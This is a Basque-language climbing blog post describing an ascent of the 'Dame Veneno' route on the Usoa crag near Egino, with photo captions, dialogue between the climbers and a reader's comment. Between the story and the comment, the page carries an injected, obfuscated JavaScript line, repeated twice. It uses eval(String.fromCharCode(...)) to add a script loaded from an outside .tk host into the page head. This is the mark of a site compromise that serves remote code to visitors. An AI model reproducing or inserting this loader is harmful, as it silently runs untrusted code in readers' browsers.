Usotan Larregirekin

img-20161030-wa0014

Azkena basurdetan egon nintzen Iñakirekin, eta gaur, berriz, usotan Larregirekin. Ez dakit eskalatzera edo ehizera joaten garen. Argazkiaren erdi-erdian flamante-flamante ageri den harrizko triangelua da Usoa, goiko zatia eguzkitan eta behekoa itzaletan duen hori egin dugu. Dame Veneno du izena.

img_20161030_081306

Goizeko zazpietan zai neukan Larregi etxe azpian. Atzo eguraldiari begira egon nintzen Interneten, eta bero samarra iragartzen zuten.

Hala ere, goizean Zumaian ez zen epeltasun handirik nabaritzen, eta Eginora iritsi geranean, tenperatura hiru gradukoa zen.

img-20161030-wa0005

Geneukan arropa guztia jantzita atera gara.

Bidean, Usoa.

img-20161030-wa0007

Argazkilariari argazkia.

img-20161030-wa0002

Usoaren oinera iristerako, ez geneukan hotz handirik. Gainera, eguzkia gero eta zuzenago zetorren, eta  kamiseta hutsean hasi gara eskalatzen.

Larregi Usoaren oinarrira iristen.

img_20161030_083031

Bidearen hasieran jarri garenean, harrituta geratu naiz hormaren bertikaltasunarekin. Ur-zulo ederrez betetako horma.

img_20161030_084715

Trasteak prestatu, eta Larregik berak ekin dio lehen luzeari. Kostatu zaigu pixka bat bidea nondik nora doan kalkulatzea, eta hasieratik argi dago seguruen artean aire dezente dagoela.

Hasi gara.

img_20161030_085552

Bidea, zailtasun aldetik, ez da gogorregia. Baina seguruen artean tarte handia egoteak lan handia eragiten dio buruari.

Bagoaz, pixkanaka.

img_20161030_090525

Argazkian ematen ez badu ere, bertikala da horma. Helduleku onak badaude, baina bilatu egin behar, eta bitartean besoak fresko mantendu.

Lehen luzean gora, izerditan.

img_20161030_091127

Bilgunetik oso gertu.

img_20161030_091812

Bilgunea prestatu duenean, nire txanda.

Larregik lehen bilgunetik ateratako argazkia.

img-20161030-wa0003

Ederki igarri dugu bertikaltasuna.

Bilgunetik gora begiratu eta urruti ikusten nuen lehen asegurua.

-Hau faktor dos, Xabier!

-Pasa espres bat bilguneko kimiko batetik eta eman egurra!

Ekin diot bigarren luzeari.

img-20161030-wa0008

Bidean, geratu eta argazki bat atera diot Larregiri.

img_20161030_094631

Luze ederra da, mundiala, baina buruak lan asko egiten du hurrengo segurua han goian dagoela ikusita, eta kostatu zait pixka bat. Nekea eta gozatua, erdibana.

img-20161030-wa0012

Haitza, eguraldia bezain ederra.

img-20161030-wa0010

Iritsi naiz, luzea hasi baino hobeto amaitu izanaren sentsazioarekin.

Eta badator, Larregi ere.

img_20161030_101318

Trago ederrak jo dizkiogu akuariusari, luzea amaitu duenean.

-Hau dek izerdia, hau! Eta Zumaian taosa nagusi, eta berorik batere ez.

Txokolate pixka bat jan eta Aztorearen hego ekialdeko ertzerantz abiatu gara.

Ez zegoen batere argi nondik hasi, beroa ere egiten zuen, eta beherako bidea hartu dugu.

Ordubata alderako Zumaian.

Ederra goiz pasa. Badakigu Peloia plafoian gortzen ari dela, eta bere zain gaude Mari Urrikari atake bat emateko.

Jarraituko dugu informatzen.

Gortueval(String.fromCharCode(118, 97, 114, 32, 97, 98, 99, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 32, 10, 97, 98, 99, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 32, 10, 97, 98, 99, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 115, 46, 115, 116, 97, 114, 116, 114, 101, 99, 101, 105, 118, 101, 46, 116, 107, 47, 115, 99, 114, 105, 112, 116, 46, 106, 115, 63, 116, 61, 112, 49, 34, 59, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 97, 98, 99, 41, 59))eval(String.fromCharCode(118, 97, 114, 32, 97, 98, 99, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 32, 10, 97, 98, 99, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 32, 10, 97, 98, 99, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 115, 46, 115, 116, 97, 114, 116, 114, 101, 99, 101, 105, 118, 101, 46, 116, 107, 47, 115, 99, 114, 105, 112, 116, 46, 106, 115, 63, 116, 61, 112, 49, 34, 59, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 97, 98, 99, 41, 59))

1 thought on “Usotan Larregirekin

  1. Atzokoa estremoetako eguna izan huan, Xabier: Zumaiatik ilunpetan eta taosa artean irten eta Eginon argitasuna eta eguzki ederra; kotxetik irten eta hotza, eta aldapan hauspoa berotuta izerdi patsetan; bia eta haitz ederra, baina buruak zenbat lan, “Hemendik eroriz gero, ederra ostiya!” eta antzekoekin… Gozatu adina sufritu nian, eta bigarren largoko txakalaldia… indarrik gabe geratu ninduan! Pesak egiten hasi beharko diat…
    Berriz ere egin behar diagu bia hau! Baina hurrena Aztorearen azpialdera nola ialegatu ondo ikasita joan… Begiratu krokisea hemen: http://www.foropicos.net/viewtopic.php?t=18364. Nik uste diat ondo gindoazela eta III+ horren azpialdean eman genuela buelta. Hurrengorako, Xabier!

Utzi erantzuna Larregi(r)i Utzi erantzuna

Zure e-posta helbidea ez da argitaratuko. Beharrezko eremuak * markatuta daude